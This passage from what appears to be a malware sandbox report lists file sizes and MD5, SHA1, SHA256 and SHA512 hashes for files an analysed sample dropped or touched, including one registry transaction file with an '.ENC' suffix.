SHA512cda538550dafbeff0f266dd86d6287cb879530efadfbbabcc337c836a09ad979ddc7592f4c69f26c406b0781c54fa9490e7aa3faee10ecd68cff7867ebfc3a96
-
Filesize
12KB
MD5911875a9c168ca944992e2ed05aedf43
SHA1968f1fb8dde60d4e60b1a375d21267c91b2fca53
SHA2568216bc454a19c1757432681a70caac8c75320988ae4225e41f3a07b2b1b687af
SHA51252be6b36290ac8d1f93b3ee8a075df44bc260cb5b1dcd90d7a9c827e64510c24de081f547759e9190860b8c7a482ee5792e46ea27f75329428dddb757be48b5b
-
Filesize
898KB
MD5125b64d2dac1748f9b797297aa32d88f
SHA10856e86419a016f35bce94883519e98cfe7a9aaa
SHA2568b13c0f32bdfde56c7d51e5b18bd0f80fbcab1d256f58cca0cdad80f18355ec5
SHA5124e6b50a4bdb79ceb3dceab6eb511166e015fc6a300bbdad8584b4f510f58b9e9846b7afe0e48296e7a3db878fc8cbccce0ee06ff413419f38d137f7d8d9a12ae
-
Filesize
20KB
MD5776f6d1bb394b6e460e6394d1a8751de
SHA1df3fb23a2e19316c86ed3e9d926244ebd2d449b4
SHA256019ef831e5b6f996718caca5ee7e2f602eaa9a3552ad5b905ac067e3a1ba486c
SHA512401bb7c609e49dfccc0f0674d7ca87cbdf05cd138292e1669ab75cd914ad60e59c3856afef18fc14a9f36f4fd750d76d45b46f6ba52b2a4daa1528cca45bce1c
-
Filesize
465KB
MD565306281aa75262a5eb508f3f84e5f2f
SHA1239be9ccd040b556b7408c23f16f6acdba4c3a17
SHA2565aa89a71851733ae43e8bdea90a2f616beccace7905404cc83eaec9fabb91131
SHA512918a91ab2c0d88f0240763238c430e4d861773380ccf1fe1db5457ada3d9637699edc127d090eccc1098d2a8c393d00815c97eabcd0bb78eff6dc6382f920a52
-
Filesize
765KB
MD5ddb475a0fb107771e5e38b445b6bdfd8
SHA14f3d2df9b53817efd03fa6c75390001ed9d4bc5a
SHA256f5fec24af8fe9976a56810819539c97bea07f98ceeca489058262af5916c8cb5
SHA512bf4359b2cbbcc7dadfd7c54df3ffbc7404bc881b03c8a95e2a6a3c5eb9844418715ed67dd58f5c6bfd1de031a1c568305f86c7a8c0eccd748a0c44d6c8375f14
-
Filesize
13KB
MD5db763a75c3c1d3faf8f0cce9cedcc2b4
SHA18e962c65dc4124075ff8da7b2f1ec4b55c4f994c
SHA256b2db87085e3c903cee5b94ec5add077def7be6782b2f1ac5e73e7389789b0f91
SHA512dce1675251d16dc718f66c175fb0724c218d9c8f8c39d4ffaa1be5811605fccea3db0bfe0791b0d0440f7df43e82b42496f07c5b8b3dbe1b02cbe9d6d476aeda
-
Filesize
698KB
MD51c6c3fcd18b7be4f43f1676b2e87d20d
SHA1b228697afea12936b95ea78c13a023863c71df45
SHA2568b03a7341278df59b866268107950367b353cd5116e3cd411417a7e533337d5d
SHA512f2d430b444d5f7b34284c2a0a862dd3df13830661183a5364eb7075563a096d9b397c45bf19f41b29ed88086ecc26d539e045b280f06f1199273469c5695e899
-
Filesize
632KB
MD555e4fe61515ba5735da3121980e1c0eb
SHA1fa0fc53072187bcc900b2d187f7b835b6a5dc2d0
SHA2566fc6984d45e38059fbe464767f9529611e8d1118937169e0f2d253b3925160a7
SHA5121eed6a08567aa3f33c2e4c967cdf24970248fb11826a251cd8c4c74ba12867fe409373e5496ef55287cc85e4cc0223d762c39cc93eae851fbaa4ee8b6ccb380f
-
Filesize
1.3MB
MD51072667830005517a91cca328902970f
SHA1b7c681255071ec655372d631c6d7ee3075fec374
SHA2569b41324984d8145b18347d7c589dd481c4d19950b0ca2ecd99b87871134d28df
SHA512fee20789fb13feebd11742242aab0a13ea3a737ed0f05ab48dbf24367b2ffd85ae98b43eefd9fdbb3e8ea03e1ea9eee20d2a2d7954e89d2d27cc5639c1347bba
-
Filesize
399KB
MD54d9d41efbb2bc6171d9362ffe109c5bc
SHA1260be6e79541b5e8641bd4498120a9f89e1b3a3e
SHA256b37a67f440233cb528c15f687192b3905731d3ccc7a07ec9cf0161011a27a127
SHA512aa792b3ca56af61e867c0b750b440d6574ae80fd96f3193521ca2bc6033957ea66853658674d0848dbbd0ffe584d1cd44e9ec8bf157635161ce63453c8154ccb
-
Filesize
224B
MD5773981ed0a348be8e01abee672868972
SHA1d2bbdfd26c9013d5ff4d0c2060395f2eac8d5bdb
SHA25627a00982fcb42825bf83ced13811bea7f34348dc2416bd225960ff2506e77eb0
SHA5126f38c8b1da75f93d87195bbcb1b1fef1d3fd92af46ce35f6248a85915c7e94a7c41cb67036be33b25e8046c5697ec41cfa79804d736535d3c11044f08d9ac7b8
-
Filesize
96B
MD556e3e01c34429c3b2fd31a9652d99bcd
SHA12805ee3604c21beff73feae8321f492cf6085c0b
SHA256dcebff5ee2b19a7715d96b7007927dfdd76777943b9ad1916a337d5095f5c833
SHA512e6326da6b6dbcd4ed83b7c574ce649f33a9a5ecf8113d9a052ca3d30882e2756b237acc8299de90f31b06e9a46f1f8ee35b4aaa4f5ff4d6e700cfd6ab5286af2
-
Filesize
416B
MD59ea6954404b5a577b1f9b33a406031c8
SHA1f926366dd7449b2f7060b7ceab8a760c4fcca079
SHA256f5f0ed96295ab3449e7b25ea1f061940effc12223232353f19646f30556c99ea
SHA5120a272db3ebee48370db7719833519a94dde7afe799e65987e179adbbf3b887c4ed9302adb2988d9edcc3083991f984bf79171710359eef2ec8c01595ad2bc73d
-
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
Filesize16B
MD5191587bd82cfc669de9cde5290d8e8bf
SHA16843dde98c77c86c8f39bb9ba90bb784fe151f72
SHA2565583145543c5d9ee50958c9f83e1e99ab6a0ba832cf53b094fdc15ee8e21b72c
SHA512c01b35173886465262a80cfc1d6791ef776898dff882c9fcdf128c57d1bebd159ff2dcd8b5bc28ef8bb2f856cb2d18977f2ae116df9b12077574806f21b3eb68
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e